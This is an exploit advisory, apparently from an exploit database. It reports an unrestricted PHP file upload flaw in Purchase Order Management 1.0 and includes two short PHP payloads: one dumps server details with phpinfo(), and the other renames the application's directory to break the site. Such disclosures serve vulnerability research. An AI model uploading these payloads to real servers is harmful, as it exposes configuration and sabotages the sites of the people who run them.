Purchase Order Management 1.0 Shell Upload

2023.03.08
Credit: nu11secur1ty
Risk: High
Local: No
Remote: No
CVE: N/A
CWE: CWE-264

## Title: Purchase Order Management-1.0 - File Inclusion Vulnerabilities - Unprivileged user interaction - file upload in the server ## Author: nu11secur1ty ## Date: 03.06.2023 ## Vendor: https://www.sourcecodester.com/user/257130/activity ## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html ## Reference: https://brightsec.com/blog/file-inclusion-vulnerabilities/ ## Description: The Purchase Order Management-1.0 suffer from File Inclusion Vulnerabilities. The users of this system are allowed to submit input into files or upload files to the server. The malicious attacker can get absolute control of this system! STATUS: CRITICAL Vulnerability [+]Get Info: ```PHP <?php // by nu11secur1ty - 2023 phpinfo(); ?> ``` [+]Exploit: ```PHP <?php // by nu11secur1ty - 2023 // Old Name Of The file $old_name = "C:/xampp7/htdocs/purchase_order/" ; // New Name For The File $new_name = "C:/xampp7/htdocs/purchase_order_stupid/" ; // using rename() function to rename the file rename( $old_name, $new_name) ; ?> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0) ## Proof and Exploit: [href](https://streamable.com/vkq31h) ## Time spend: 00:35:00


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top